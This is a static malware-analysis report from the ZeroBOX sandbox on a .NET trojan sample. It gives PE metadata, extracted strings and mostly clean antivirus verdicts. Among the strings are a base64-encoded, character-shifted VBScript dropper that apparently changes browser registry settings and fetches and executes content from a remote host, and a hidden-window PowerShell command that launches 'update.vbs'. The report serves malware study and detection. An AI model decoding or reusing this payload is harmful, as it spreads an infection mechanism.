Static | ZeroBOX

PE Compile Time

2023-06-15 10:02:48

PDB Path

D:\work\Virus\1_troy\c#\pack_2023\2023-06\work\obj\Debug\ConsoleApplication1.pdb

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x00001be4 0x00001c00 5.38641423911
.rsrc 0x00004000 0x000470c8 0x00047200 5.8133461268
.reloc 0x0004c000 0x0000000c 0x00000200 0.0815394123432

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0004a678 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0004a678 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0004a678 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0004a678 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0004a678 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_ICON 0x0004a678 0x00000468 LANG_NEUTRAL SUBLANG_NEUTRAL GLS_BINARY_LSB_FIRST
RT_GROUP_ICON 0x0004aaf0 0x0000005a LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0004ab5c 0x0000036c LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_MANIFEST 0x0004aed8 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
ConsoleApplication1
ReadUInt32
get_UTF8
<Module>
System.IO
mscorlib
Thread
FileMode
IDisposable
GetName
StyleTime
DateTime
Combine
FileShare
Dispose
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
CollectionAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
ConsoleApplication1.exe
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
GetString
GetTempPath
GetFolderPath
Internal
user32.dll
FileStream
System
PerfCollectionDomain
SeekOrigin
Builtin
NullableVersion
get_Location
System.Reflection
get_Position
BinaryReader
SpecialFolder
Binder
Buffer
.cctor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
Strings
FileAccess
Process
Exists
Concat
Object
get_Default
Result
Environment
parent
ResultEvent
ThreadStart
Convert
System.Text
WriteAllText
MessageBox
StubBasicGateway
GetExecutingAssembly
BlockCopy
WrapNonExceptionThrows
Copyright
2023
ConsoleApplication1
1.0.0.0
$25c8d33e-8d0f-4e4f-95d5-815b75fbabb7
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
D:\work\Virus\1_troy\c#\pack_2023\2023-06\work\obj\Debug\ConsoleApplication1.pdb
_CorExeMain
mscoree.dll
--0000000000000--
-CCKKKKKNKNVNVNVVVVVVNNKH-
}||||}
&ilssmli ]
b"'uZ8
fcfjgH
g855*8Ho
RWG20002GHGJGGJJJJOONHHH@:8
+=BAAAAAAAAB=+
6R,LUWWaaK
,aababK
Bnbe_[,[bnnnbK
&TlnnsK
#esssK
Fyvk[5
AqyyyK
Fyyq>)")[yyyyK
=UqjjL!4^qnqV=
24FBBFBBFBFF=2
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
RGVjb2RlID0gIiI6Zm9yIGkgPSAxIHRvIDYxMToJRGVjb2RlID0gRGVjb2RlICsgY2hyKEFzYyhtaWQoIj1ScSNIdXVydSNVaHZ4cGgjUWh7dz1WeGUjVmh3TEhWd2R3aCssPUZycXZ3I2tuI0AjKUs7MzMzMzMzND11aGpnbHUjQCMlVnJpd3pkdWhfUGxmdXJ2cml3X0xxd2h1cWh3I0h7c29ydWh1X1BkbHElPVpsd2sjSmh3UmVtaGZ3KyV6bHFwanB3dj1fdXJyd19naGlkeG93PVZ3Z1VoalN1cnklLD0xVmh3Vnd1bHFqWWRveGgja24vI3VoamdsdS8jJUZraGZuYkR2dnJmbGR3bHJxdiUvIyVxciU9MVZod0d6cnVnWWRveGgjI2tuLyN1aGpnbHUvIyVHbHZkZW9oSWx1dndVeHFGeHZ3cnBsfWglLyM0PTFWaHdHenJ1Z1lkb3hoIyNrbi8jJVZyaXd6ZHVoX1BsZnVydnJpd19IZ2poX0xIV3JIZ2poJS8jJVVoZ2x1aGZ3bHJxUHJnaCUvIzMjPUhxZyNabHdrPUhxZyNWeGU9Vmh3TEhWd2R3aD14bCNAIyV6aG9vMHZ3cnV8MWZyMW51MmRncDJscWYybXYlPVpsd2sjRnVoZHdoUmVtaGZ3KyVMcXdodXFod0h7c29ydWh1MURzc29sZmR3bHJxJSw9MVFkeWxqZHdoIyVrd3dzPTIyJSMpI3hsIykjJTJvbHZ3MXNrc0J0eGh1fEA0JT1HciN6a2xvaCMxZXh2fD1aVmZ1bHN3MVZvaGhzIzQzMz1PcnJzPWV3QDFHcmZ4cGhxdzFFcmd8MUxxcWh1V2h7dz0xVHhsdz1IcWcjWmx3az1Ie2hmeHdoK2V3LD09IixpLDEpKSAtICgzKSk6TmV4dDpFeGVjdXRlIERlY29kZTo=
-windowstyle hidden -c wscript '
powershell.exe
\update.vbs
//update.vbs
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
ConsoleApplication1
FileVersion
1.0.0.0
InternalName
ConsoleApplication1.exe
LegalCopyright
Copyright
2023
LegalTrademarks
OriginalFilename
ConsoleApplication1.exe
ProductName
ConsoleApplication1
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware
Lionic Clean
tehtris Clean
MicroWorld-eScan Gen:Heur.Bodegun.1
CMC Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Gen:Heur.Bodegun.1
Sangfor Suspicious.Win32.Save.a
K7AntiVirus Clean
BitDefender Gen:Heur.Bodegun.1
K7GW Clean
Cybereason malicious.663f89
BitDefenderTheta Gen:NN.ZemsilF.36250.sm0@ayPhGtj
VirIT Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 Clean
APEX Malicious
Paloalto Clean
ClamAV Clean
Kaspersky Clean
Alibaba Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
TACHYON Clean
Sophos Clean
Baidu Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
Trapmine Clean
FireEye Gen:Heur.Bodegun.1
Emsisoft Gen:Heur.Bodegun.1 (B)
Ikarus Clean
GData Gen:Heur.Bodegun.1
Jiangmin Clean
Webroot Clean
Google Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Bodegun.1
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Cynet Malicious (score: 100)
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX malware (ai score=88)
DeepInstinct MALICIOUS
VBA32 Trojan.MSIL.gen.05
Cylance unsafe
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Static AI - Suspicious PE
MaxSecure Clean
Fortinet Clean
AVG Clean
Avast Clean
CrowdStrike win/malicious_confidence_70% (D)
No IRMA results available.